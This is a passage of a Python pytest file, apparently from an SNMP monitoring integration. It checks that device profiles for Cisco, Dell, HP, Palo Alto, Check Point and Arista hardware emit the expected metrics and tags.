aggregator.assert_metric('snmp.{}'.format(gauge), metric_type=aggregator.GAUGE, tags=tags, count=1)
indexes = ['12', '22']
probe_types = ['6', '3']
for index, probe_type in zip(indexes, probe_types):
tags = ['chassis_index:{}'.format(index), 'probe_type:{}'.format(probe_type)] + common_tags
for gauge in VOLTAGE_GAUGES:
aggregator.assert_metric('snmp.{}'.format(gauge), metric_type=aggregator.GAUGE, tags=tags, count=1)
indexes = ['29', '22']
device_types = ['26', '4']
for index, device_type in zip(indexes, device_types):
tags = ['chassis_index:{}'.format(index), 'device_type:{}'.format(device_type)] + common_tags
aggregator.assert_metric(
'snmp.{}'.format("memoryDeviceStatus"), metric_type=aggregator.GAUGE, tags=tags, count=1
)
for gauge in DRS_GAUGES:
aggregator.assert_metric('snmp.{}'.format(gauge), metric_type=aggregator.GAUGE, tags=common_tags, count=1)
aggregator.assert_all_metrics_covered()
@pytest.mark.usefixtures("dd_environment")
def test_cisco_nexus(aggregator):
run_profile_check('cisco_nexus')
interfaces = ["GigabitEthernet1/0/{}".format(i) for i in range(1, 9)]
common_tags = common.CHECK_TAGS + ['snmp_host:Nexus-eu1.companyname.managed', 'snmp_profile:cisco-nexus']
common.assert_common_metrics(aggregator, common_tags)
for interface in interfaces:
tags = ['interface:{}'.format(interface)] + common_tags
aggregator.assert_metric('snmp.cieIfResetCount', metric_type=aggregator.MONOTONIC_COUNT, tags=tags, count=1)
for interface in interfaces:
tags = ['interface:{}'.format(interface)] + common_tags
for metric in IF_COUNTS:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=tags, count=1
)
for metric in IF_RATES:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.RATE, tags=tags, count=1)
for metric in IF_GAUGES:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1)
for metric in TCP_COUNTS:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=common_tags, count=1
)
for metric in TCP_GAUGES:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=common_tags, count=1)
for metric in UDP_COUNTS:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=common_tags, count=1
)
sensors = [1, 9, 11, 12, 12, 14, 17, 26, 29, 31]
for sensor in sensors:
tags = ['sensor_id:{}'.format(sensor), 'sensor_type:8'] + common_tags
aggregator.assert_metric('snmp.entSensorValue', metric_type=aggregator.GAUGE, tags=tags, count=1)
frus = [6, 7, 15, 16, 19, 27, 30, 31]
for fru in frus:
tags = ['fru:{}'.format(fru)] + common_tags
for metric in FRU_METRICS:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1)
cpus = [3173, 6692, 11571, 19529, 30674, 38253, 52063, 54474, 55946, 63960]
for cpu in cpus:
tags = ['cpu:{}'.format(cpu)] + common_tags
for metric in CPU_METRICS:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1)
for (index, state) in [(3, 3), (6, 6), (8, 6), (11, 6), (13, 3), (14, 6), (20, 6), (21, 4), (31, 5)]:
aggregator.assert_metric(
'snmp.ciscoEnvMonTemperatureStatusValue',
metric_type=aggregator.GAUGE,
tags=['temp_state:{}'.format(state), 'temp_index:{}'.format(index)] + common_tags,
)
aggregator.assert_metric(
'snmp.ciscoEnvMonSupplyState', metric_type=aggregator.GAUGE, tags=['power_source:1'] + common_tags,
)
fan_indices = [4, 6, 7, 16, 21, 22, 25, 27]
for index in fan_indices:
tags = ['fan_status_index:{}'.format(index)] + common_tags
aggregator.assert_metric(
'snmp.ciscoEnvMonFanState', metric_type=aggregator.GAUGE, tags=tags,
)
aggregator.assert_metric('snmp.cswStackPortOperStatus', metric_type=aggregator.GAUGE)
aggregator.assert_metric(
'snmp.cswSwitchState', metric_type=aggregator.GAUGE, tags=['mac_addr:0xffffffffffff'] + common_tags
)
frus = [2, 7, 8, 21, 26, 27, 30, 31]
for fru in frus:
tags = ['fru:{}'.format(fru)] + common_tags
aggregator.assert_metric(
'snmp.cefcFanTrayOperStatus', metric_type=aggregator.GAUGE, tags=['fru:{}'.format(fru)] + common_tags
)
aggregator.assert_metric('snmp.sysUpTimeInstance', count=1)
aggregator.assert_all_metrics_covered()
@pytest.mark.usefixtures("dd_environment")
def test_dell_poweredge(aggregator):
run_profile_check('dell-poweredge')
# Poweredge
sys_mem_gauges = [
'operatingSystemMemoryAvailablePhysicalSize',
'operatingSystemMemoryTotalPageFileSize',
'operatingSystemMemoryAvailablePageFileSize',
'operatingSystemMemoryTotalVirtualSize',
'operatingSystemMemoryAvailableVirtualSize',
]
power_supply_gauges = [
'powerSupplyStatus',
'powerSupplyOutputWatts',
'powerSupplyMaximumInputVoltage',
'powerSupplyCurrentInputVoltage',
]
temperature_probe_gauges = ['temperatureProbeStatus', 'temperatureProbeReading']
processor_device_gauges = ['processorDeviceStatus', 'processorDeviceThreadCount']
cache_device_gauges = ['cacheDeviceStatus', 'cacheDeviceMaximumSize', 'cacheDeviceCurrentSize']
memory_device_gauges = ['memoryDeviceStatus', 'memoryDeviceFailureModes']
idrac_gauges = (
['batteryState', 'controllerRollUpStatus', 'pCIDeviceStatus', 'systemSlotStatus', 'systemBIOSStatus']
+ VOLTAGE_GAUGES
+ PROBE_GAUGES
)
common_tags = common.CHECK_TAGS + ['snmp_profile:dell-poweredge']
common.assert_common_metrics(aggregator, common_tags)
chassis_indexes = [29, 31]
for chassis_index in chassis_indexes:
tags = ['chassis_index:{}'.format(chassis_index)] + common_tags
for metric in sys_mem_gauges:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, at_least=1)
indexes = [5, 17]
for index in indexes:
tags = ['chassis_index:4', 'index:{}'.format(index)] + common_tags
for metric in power_supply_gauges:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, at_least=1)
indexes = [13]
for index in indexes:
tags = ['chassis_index:18', 'index:{}'.format(index)] + common_tags
for metric in temperature_probe_gauges:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, at_least=1)
indexes = [17, 28]
for index in indexes:
tags = ['chassis_index:5', 'index:{}'.format(index)] + common_tags
for metric in processor_device_gauges:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, at_least=1)
indexes = [15, 27]
for index in indexes:
tags = ['chassis_index:11', 'index:{}'.format(index)] + common_tags
for metric in cache_device_gauges:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, at_least=1)
serial_numbers = ['forward zombies acted Jaded', 'kept oxen their their oxen oxen']
for serial_number in serial_numbers:
tags = ['serial_number_name:{}'.format(serial_number), 'chassis_index:1'] + common_tags
for metric in memory_device_gauges:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, at_least=1)
ip_addresses = ['66.97.1.103', '62.148.76.32', '45.3.243.155']
for ip_address in ip_addresses:
tags = ['ip_address:{}'.format(ip_address)] + common_tags
aggregator.assert_metric('snmp.networkDeviceStatus', metric_type=aggregator.GAUGE, tags=tags, at_least=1)
# Intel Adapter
interfaces = ['eth0', 'en1']
for interface in interfaces:
tags = ['adapter:{}'.format(interface)] + common_tags
for count in ADAPTER_IF_COUNTS:
aggregator.assert_metric(
'snmp.{}'.format(count), metric_type=aggregator.MONOTONIC_COUNT, tags=tags, count=1
)
# IDRAC
indexes = ['26', '29']
for index in indexes:
tags = ['chassis_index:{}'.format(index)] + common_tags
for gauge in SYSTEM_STATUS_GAUGES:
aggregator.assert_metric('snmp.{}'.format(gauge), metric_type=aggregator.GAUGE, tags=tags, count=1)
powers = ['supply1', 'supply2']
for power in powers:
tags = ['supply_name:{}'.format(power)] + common_tags
aggregator.assert_metric('snmp.enclosurePowerSupplyState', metric_type=aggregator.GAUGE, tags=tags, count=1)
disks = ['disk1', 'disk2']
for disk in disks:
tags = ['disk_name:{}'.format(disk)] + common_tags
for gauge in DISK_GAUGES:
aggregator.assert_metric('snmp.{}'.format(gauge), metric_type=aggregator.GAUGE, tags=tags, count=1)
for gauge in idrac_gauges:
aggregator.assert_metric('snmp.{}'.format(gauge), metric_type=aggregator.GAUGE)
aggregator.assert_all_metrics_covered()
@pytest.mark.usefixtures("dd_environment")
def test_hp_ilo4(aggregator):
run_profile_check('hp_ilo4')
status_gauges = [
'cpqHeCritLogCondition',
'cpqHeCorrMemLogStatus',
'cpqHeCorrMemLogCondition',
'cpqHeAsrStatus',
'cpqHeAsrPost',
'cpqHeAsrCondition',
'cpqHeAsrNetworkAccessStatus',
'cpqHeThermalCondition',
'cpqHeThermalTempStatus',
'cpqHeThermalSystemFanStatus',
'cpqHeThermalCpuFanStatus',
'cpqNicVtVirusActivity',
'cpqSm2CntlrServerPowerState',
'cpqSm2CntlrBatteryStatus',
'cpqSm2CntlrRemoteSessionStatus',
'cpqSm2CntlrInterfaceStatus',
]
cpqhlth_counts = ['cpqHeAsrRebootCount', 'cpqHeCorrMemTotalErrs']
cpqhlth_gauges = ['cpqHeSysUtilEisaBusMin', 'cpqHePowerMeterCurrReading', 'cpqHeSysUtilLifeTime']
cpqsm2_gauges = [
'cpqSm2CntlrBatteryPercentCharged',
'cpqSm2CntlrSelfTestErrors',
'cpqSm2EventTotalEntries',
]
EMBEDDED = 2
PCMCIA = 3
card_locations = [EMBEDDED, PCMCIA]
network_card_counts = [
'cpqSm2NicXmitBytes',
'cpqSm2NicXmitTotalPackets',
'cpqSm2NicXmitDiscardPackets',
'cpqSm2NicXmitErrorPackets',
'cpqSm2NicXmitQueueLength',
'cpqSm2NicRecvBytes',
'cpqSm2NicRecvTotalPackets',
'cpqSm2NicRecvDiscardPackets',
'cpqSm2NicRecvErrorPackets',
'cpqSm2NicRecvUnknownPackets',
]
interfaces = ['eth0', 'en1']
phys_adapter_counts = [
'cpqNicIfPhysAdapterGoodTransmits',
'cpqNicIfPhysAdapterGoodReceives',
'cpqNicIfPhysAdapterBadTransmits',
'cpqNicIfPhysAdapterBadReceives',
'cpqNicIfPhysAdapterInOctets',
'cpqNicIfPhysAdapterOutOctets',
]
phys_adapter_gauges = ['cpqNicIfPhysAdapterSpeed', 'cpqNicIfPhysAdapterSpeedMbps']
temperature_sensors = [1, 13, 28]
batteries = [1, 3, 4, 5]
common_tags = common.CHECK_TAGS + ['snmp_profile:hp-ilo4']
common.assert_common_metrics(aggregator, common_tags)
for metric in status_gauges:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=common_tags, count=1)
for metric in cpqhlth_counts:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=common_tags, count=1
)
for metric in cpqhlth_gauges:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=common_tags, count=1)
for metric in cpqsm2_gauges:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=common_tags, count=1)
for index in temperature_sensors:
tags = ['temperature_index:{}'.format(index)] + common_tags
aggregator.assert_metric('snmp.cpqHeTemperatureCelsius', metric_type=aggregator.GAUGE, tags=tags, count=1)
aggregator.assert_metric('snmp.cpqHeTemperatureCondition', metric_type=aggregator.GAUGE, tags=tags, count=1)
for index in batteries:
tags = ['battery_index:{}'.format(index)] + common_tags
aggregator.assert_metric('snmp.cpqHeSysBatteryCondition', metric_type=aggregator.GAUGE, tags=tags, count=1)
aggregator.assert_metric('snmp.cpqHeSysBatteryStatus', metric_type=aggregator.GAUGE, tags=tags, count=1)
for location in card_locations:
tags = ['nic_stats_location:{}'.format(location)] + common_tags
for metric in network_card_counts:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=tags, count=1
)
for interface in interfaces:
tags = ['interface:{}'.format(interface)] + common_tags
for metric in phys_adapter_counts:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=tags, count=1
)
for metric in phys_adapter_gauges:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1)
aggregator.assert_all_metrics_covered()
@pytest.mark.usefixtures("dd_environment")
def test_proliant(aggregator):
run_profile_check('hpe-proliant')
common_tags = common.CHECK_TAGS + ['snmp_profile:hpe-proliant']
common.assert_common_metrics(aggregator, common_tags)
for metric in TCP_COUNTS:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=common_tags, count=1
)
for metric in TCP_GAUGES:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=common_tags, count=1)
for metric in UDP_COUNTS:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=common_tags, count=1
)
cpu_gauges = [
"cpqSeCpuSlot",
"cpqSeCpuSpeed",
"cpqSeCpuStatus",
"cpqSeCpuExtSpeed",
"cpqSeCpuCore",
"cpqSeCPUCoreMaxThreads",
"cpqSeCpuPrimary",
]
cpu_indexes = [0, 4, 6, 8, 13, 15, 26, 27]
for idx in cpu_indexes:
tags = ['cpu_index:{}'.format(idx)] + common_tags
for metric in cpu_gauges:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1)
cpu_util_gauges = ["cpqHoCpuUtilMin", "cpqHoCpuUtilFiveMin", "cpqHoCpuUtilThirtyMin", "cpqHoCpuUtilHour"]
cpu_unit_idx = [4, 7, 13, 20, 22, 23, 29]
for idx in cpu_unit_idx:
tags = ['cpu_unit_index:{}'.format(idx)] + common_tags
for metric in cpu_util_gauges:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1)
file_sys_gauges = [
"cpqHoFileSysSpaceTotal",
"cpqHoFileSysSpaceUsed",
"cpqHoFileSysPercentSpaceUsed",
"cpqHoFileSysAllocUnitsTotal",
"cpqHoFileSysAllocUnitsUsed",
"cpqHoFileSysStatus",
]
file_sys_idx = [5, 8, 11, 15, 19, 21, 28, 30]
for idx in file_sys_idx:
tags = ['file_sys_index:{}'.format(idx)] + common_tags
for metric in file_sys_gauges:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1)
memory_gauges = [
"cpqSiMemModuleSize",
"cpqSiMemModuleType",
"cpqSiMemModuleSpeed",
"cpqSiMemModuleTechnology",
"cpqSiMemModuleECCStatus",
"cpqSiMemModuleFrequency",
"cpqSiMemModuleCellStatus",
]
memory_idx = [(6, 16), (7, 17), (7, 30), (8, 20), (10, 4), (15, 27), (20, 14), (21, 14), (23, 0), (28, 20)]
for board_idx, mem_module_index in memory_idx:
tags = ['mem_board_index:{}'.format(board_idx), "mem_module_index:{}".format(mem_module_index)] + common_tags
for metric in memory_gauges:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1)
drive_counts = [
"cpqDaPhyDrvUsedReallocs",
"cpqDaPhyDrvRefHours",
"cpqDaPhyDrvHardReadErrs",
"cpqDaPhyDrvRecvReadErrs",
"cpqDaPhyDrvHardWriteErrs",
"cpqDaPhyDrvRecvWriteErrs",
"cpqDaPhyDrvHSeekErrs",
"cpqDaPhyDrvSeekErrs",
]
drive_gauges = [
"cpqDaPhyDrvStatus",
"cpqDaPhyDrvFactReallocs",
"cpqDaPhyDrvSpinupTime",
"cpqDaPhyDrvSize",
"cpqDaPhyDrvSmartStatus",
"cpqDaPhyDrvCurrentTemperature",
]
drive_idx = [(0, 2), (0, 28), (8, 31), (9, 24), (9, 28), (10, 17), (11, 4), (12, 20), (18, 22), (23, 2)]
for drive_cntrl_idx, drive_index in drive_idx:
tags = ['drive_cntrl_idx:{}'.format(drive_cntrl_idx), "drive_index:{}".format(drive_index)] + common_tags
for metric in drive_counts:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=tags, count=1
)
for metric in drive_gauges:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1)
for interface in ['eth0', 'eth1']:
if_tags = ['interface:{}'.format(interface)] + common_tags
for metric in IF_COUNTS:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=if_tags, count=1
)
for metric in IF_GAUGES:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=if_tags, count=1)
for metric in IF_RATES:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.RATE, tags=if_tags, count=1)
mem_boards = ['11', '12']
for board in mem_boards:
tags = ['mem_board_index:{}'.format(board)] + common_tags
aggregator.assert_metric('snmp.cpqHeResMem2ModuleCondition', metric_type=aggregator.GAUGE, tags=tags, count=1)
adapter_gauges = ['cpqNicIfPhysAdapterStatus', 'cpqNicIfPhysAdapterState']
for gauge in adapter_gauges:
tags = ['adapter_name:adapter', 'adapter_mac_addr:mac'] + common_tags
aggregator.assert_metric('snmp.{}'.format(gauge), metric_type=aggregator.GAUGE, tags=tags, count=1)
power_metrics = [
'cpqHeFltTolPowerSupplyStatus',
'cpqHeFltTolPowerSupplyCapacityUsed',
'cpqHeFltTolPowerSupplyCapacityMaximum',
]
for gauge in power_metrics:
tags = ['chassis_num:30'] + common_tags
aggregator.assert_metric('snmp.{}'.format(gauge), metric_type=aggregator.GAUGE, tags=tags, count=1)
controller_index = ['controller_index:3'] + common_tags
aggregator.assert_metric(
'snmp.{}'.format("cpqDaCntlrCondition"), metric_type=aggregator.GAUGE, tags=controller_index, count=1
)
thermal_metrics = ['cpqHeThermalCondition', 'cpqHeSysUtilLifeTime', 'cpqHeFltTolPwrSupplyStatus']
for metric in thermal_metrics:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=common_tags, count=1)
aggregator.assert_all_metrics_covered()
@pytest.mark.usefixtures("dd_environment")
def test_generic_host_resources(aggregator):
instance = common.generate_instance_config([])
instance['community_string'] = 'generic_host'
instance['enforce_mib_constraints'] = False
instance['profile'] = 'generic'
init_config = {'profiles': {'generic': {'definition_file': '_generic-host-resources.yaml'}}}
check = SnmpCheck('snmp', init_config, [instance])
check.check(instance)
common_tags = common.CHECK_TAGS + ['snmp_profile:generic']
common.assert_common_metrics(aggregator, common_tags)
sys_metrics = [
'snmp.hrSystemUptime',
'snmp.hrSystemNumUsers',
'snmp.hrSystemProcesses',
'snmp.hrSystemMaxProcesses',
]
for metric in sys_metrics:
aggregator.assert_metric(metric, metric_type=aggregator.GAUGE, tags=common_tags, count=1)
aggregator.assert_metric('snmp.hrStorageAllocationUnits', count=2)
aggregator.assert_metric('snmp.hrStorageSize', count=2)
aggregator.assert_metric('snmp.hrStorageUsed', count=2)
aggregator.assert_metric('snmp.hrStorageAllocationFailures', count=2)
aggregator.assert_metric('snmp.hrProcessorLoad', count=2)
aggregator.assert_all_metrics_covered()
@pytest.mark.usefixtures("dd_environment")
def test_palo_alto(aggregator):
run_profile_check('pan-common')
common_tags = common.CHECK_TAGS + ['snmp_profile:palo-alto']
common.assert_common_metrics(aggregator, common_tags)
session = [
'panSessionUtilization',
'panSessionMax',
'panSessionActive',
'panSessionActiveTcp',
'panSessionActiveUdp',
'panSessionActiveICMP',
'panSessionActiveSslProxy',
'panSessionSslProxyUtilization',
]
global_protect = [
'panGPGWUtilizationPct',
'panGPGWUtilizationMaxTunnels',
'panGPGWUtilizationActiveTunnels',
]
entity = [
'panEntityTotalPowerAvail',
'panEntityTotalPowerUsed',
]
entry = ['panEntryFRUModulePowerUsed', 'panEntryFRUModuleNumPorts']
for metric in session:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=common_tags, count=1)
for metric in global_protect:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=common_tags, count=1)
for metric in entity:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=common_tags, count=1)
for metric in entry:
# Needs cross table entPhysicalIsFRU tag
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=common_tags)
# Needs cross table entLogicalDescr tag
aggregator.assert_metric('snmp.panEntryFanTrayPowerUsed', metric_type=aggregator.GAUGE, tags=common_tags)
aggregator.assert_all_metrics_covered()
@pytest.mark.usefixtures("dd_environment")
def test_cisco_asa_5525(aggregator):
run_profile_check('cisco_asa_5525')
common_tags = common.CHECK_TAGS + ['snmp_profile:cisco-asa-5525', 'snmp_host:kept']
common.assert_common_metrics(aggregator, common_tags)
for metric in TCP_COUNTS:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=common_tags, count=1
)
for metric in TCP_GAUGES:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=common_tags, count=1)
for metric in UDP_COUNTS:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=common_tags, count=1
)
if_tags = ['interface:eth0'] + common_tags
for metric in IF_COUNTS:
aggregator.assert_metric(
'snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=if_tags, count=1
)
for metric in IF_GAUGES:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=if_tags, count=1)
for metric in IF_RATES:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.RATE, tags=if_tags, count=1)
aggregator.assert_metric('snmp.cieIfResetCount', metric_type=aggregator.MONOTONIC_COUNT, tags=common_tags, count=1)
frus = [3, 4, 5, 7, 16, 17, 24, 25]
for fru in frus:
tags = ['fru:{}'.format(fru)] + common_tags
for metric in FRU_METRICS:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1)
cpus = [7746]
for cpu in cpus:
tags = ['cpu:{}'.format(cpu)] + common_tags
for metric in CPU_METRICS:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags, count=1)
sensor_tags = ['sensor_id:31', 'sensor_type:9'] + common_tags
aggregator.assert_metric('snmp.entPhySensorValue', metric_type=aggregator.GAUGE, tags=sensor_tags, count=1)
stat_tags = [(20, 2), (5, 5)]
for (svc, stat) in stat_tags:
aggregator.assert_metric(
'snmp.cfwConnectionStatValue',
metric_type=aggregator.GAUGE,
tags=['stat_type:{}'.format(stat), 'service_type:{}'.format(svc)] + common_tags,
)
aggregator.assert_metric('snmp.crasNumDeclinedSessions', metric_type=aggregator.GAUGE, tags=common_tags)
aggregator.assert_metric('snmp.crasNumSessions', metric_type=aggregator.GAUGE, tags=common_tags)
aggregator.assert_metric('snmp.crasNumUsers', metric_type=aggregator.GAUGE, tags=common_tags)
aggregator.assert_metric(
'snmp.crasNumSetupFailInsufResources', metric_type=aggregator.MONOTONIC_COUNT, tags=common_tags
)
aggregator.assert_metric('snmp.cipSecGlobalActiveTunnels', metric_type=aggregator.GAUGE, tags=common_tags)
aggregator.assert_metric('snmp.cipSecGlobalHcInOctets', metric_type=aggregator.MONOTONIC_COUNT, tags=common_tags)
aggregator.assert_metric('snmp.cipSecGlobalHcOutOctets', metric_type=aggregator.MONOTONIC_COUNT, tags=common_tags)
for (index, state) in [(3, 3), (6, 6), (8, 6), (11, 6), (13, 3), (14, 6), (20, 6), (21, 4), (31, 5)]:
aggregator.assert_metric(
'snmp.ciscoEnvMonTemperatureStatusValue',
metric_type=aggregator.GAUGE,
tags=['temp_state:{}'.format(state), 'temp_index:{}'.format(index)] + common_tags,
)
aggregator.assert_metric(
'snmp.ciscoEnvMonSupplyState', metric_type=aggregator.GAUGE, tags=['power_source:1'] + common_tags,
)
fan_indices = [4, 6, 7, 16, 21, 22, 25, 27]
for index in fan_indices:
tags = ['fan_status_index:{}'.format(index)] + common_tags
aggregator.assert_metric(
'snmp.ciscoEnvMonFanState', metric_type=aggregator.GAUGE, tags=tags,
)
aggregator.assert_metric('snmp.cswStackPortOperStatus', metric_type=aggregator.GAUGE)
aggregator.assert_metric(
'snmp.cswSwitchState', metric_type=aggregator.GAUGE, tags=['mac_addr:0xffffffffffff'] + common_tags
)
frus = [2, 7, 8, 21, 26, 27, 30, 31]
for fru in frus:
tags = ['fru:{}'.format(fru)] + common_tags
        aggregator.assert_metric('snmp.cefcFanTrayOperStatus', metric_type=aggregator.GAUGE, tags=tags)
for metrics in MEMORY_METRICS:
tags = ['mem_pool_name:test_pool'] + common_tags
aggregator.assert_metric('snmp.{}'.format(metrics), metric_type=aggregator.GAUGE, tags=tags)
for conn in [1, 2, 5]:
conn_tags = ['connection_type:{}'.format(conn)] + common_tags
aggregator.assert_metric('snmp.cfwConnectionStatCount', metric_type=aggregator.RATE, tags=conn_tags)
hardware_tags = [(3, 'Secondary unit'), (5, 'Primary unit'), (6, 'Failover LAN Interface')]
for (htype, hdesc) in hardware_tags:
aggregator.assert_metric(
'snmp.cfwHardwareStatusValue',
metric_type=aggregator.GAUGE,
tags=['hardware_type:{}'.format(htype), 'hardware_desc:{}'.format(hdesc)] + common_tags,
)
for switch in [4684, 4850, 8851, 9997, 15228, 16580, 24389, 30813, 36264]:
aggregator.assert_metric(
'snmp.cvsChassisUpTime',
metric_type=aggregator.GAUGE,
tags=['chassis_switch_id:{}'.format(switch)] + common_tags,
)
aggregator.assert_metric('snmp.sysUpTimeInstance', count=1)
# RTT
rtt_indexes = [1, 7, 10, 13, 15, 18, 20]
rtt_types = [22, 21, 17, 6, 20, 8, 16]
rtt_states = [3, 1, 6, 4, 6, 1, 6]
rtt_gauges = ['rttMonLatestRttOperCompletionTime', 'rttMonLatestRttOperSense', 'rttMonCtrlOperTimeoutOccurred']
    for rtt_index, rtt_type, rtt_state in zip(rtt_indexes, rtt_types, rtt_states):
        tags = [
            "rtt_index:{}".format(rtt_index),
            "rtt_type:{}".format(rtt_type),
            "rtt_state:{}".format(rtt_state),
        ] + common_tags
        for rtt in rtt_gauges:
            aggregator.assert_metric('snmp.{}'.format(rtt), metric_type=aggregator.GAUGE, tags=tags)
aggregator.assert_all_metrics_covered()
@pytest.mark.usefixtures("dd_environment")
def test_cisco_csr(aggregator):
run_profile_check('cisco-csr1000v')
common_tags = common.CHECK_TAGS + ['snmp_profile:cisco-csr1000v']
common.assert_common_metrics(aggregator, common_tags)
tags = ['neighbor:244.12.239.177'] + common_tags
for metric in PEER_GAUGES:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags)
for metric in PEER_RATES:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.RATE, tags=tags)
aggregator.assert_all_metrics_covered()
aggregator.assert_metrics_using_metadata(get_metadata_metrics())
@pytest.mark.usefixtures("dd_environment")
def test_checkpoint_firewall(aggregator):
run_profile_check('checkpoint-firewall')
common_tags = common.CHECK_TAGS + ['snmp_profile:checkpoint-firewall']
common.assert_common_metrics(aggregator, common_tags)
cpu_metrics = [
'multiProcUserTime',
'multiProcSystemTime',
'multiProcIdleTime',
'multiProcUsage',
]
cpu_cores = [7097, 13039, 13761, 28994, 29751, 33826, 40053, 48847, 61593, 65044]
for core in cpu_cores:
tags = ['cpu_core:{}'.format(core)] + common_tags
for metric in cpu_metrics:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags)
aggregator.assert_metric('snmp.procNum', metric_type=aggregator.GAUGE, tags=common_tags)
mem_metrics = ['memTotalReal64', 'memActiveReal64', 'memFreeReal64', 'memTotalVirtual64', 'memActiveVirtual64']
for metric in mem_metrics:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=common_tags)
disk_metrics = [
'multiDiskSize',
'multiDiskUsed',
'multiDiskFreeTotalBytes',
'multiDiskFreeAvailableBytes',
'multiDiskFreeTotalPercent',
'multiDiskFreeAvailablePercent',
]
appliance_metrics = [
'fanSpeedSensorValue',
'fanSpeedSensorStatus',
'tempertureSensorValue',
'tempertureSensorStatus',
]
common_indices = range(10)
common_names = ['first', 'second', 'third', 'fourth', 'fifth', 'sixth', 'seventh', 'eighth', 'ninth', 'tenth']
for idx in common_indices:
name = common_names[idx]
tags = ['disk_index:{}'.format(idx), 'disk_name:{}'.format(name)] + common_tags
for metric in disk_metrics:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags)
tags = ['sensor_index:{}'.format(idx), 'sensor_name:{}'.format(name)] + common_tags
for metric in appliance_metrics:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=tags)
fw_count_metrics = ['fwAccepted', 'fwDropped', 'fwRejected']
for metric in fw_count_metrics:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.MONOTONIC_COUNT, tags=common_tags)
fw_gauge_metrics = ['fwNumConn', 'fwPeakNumConn']
for metric in fw_gauge_metrics:
aggregator.assert_metric('snmp.{}'.format(metric), metric_type=aggregator.GAUGE, tags=common_tags)
aggregator.assert_all_metrics_covered()
@pytest.mark.usefixtures("dd_environment")
def test_arista(aggregator):
run_profile_check('arista')
common_tags = common.CHECK_TAGS + ['snmp_profile:arista']
common.assert_common_metrics(aggregator, common_tags)
aggregator.assert_metric(
'snmp.aristaEgressQueuePktsDropped',
metric_type=aggregator.MONOTONIC_COUNT,
tags=common_tags + ['interface_index:13', 'queue_index:10'],
count=1,
)
aggregator.assert_metric(
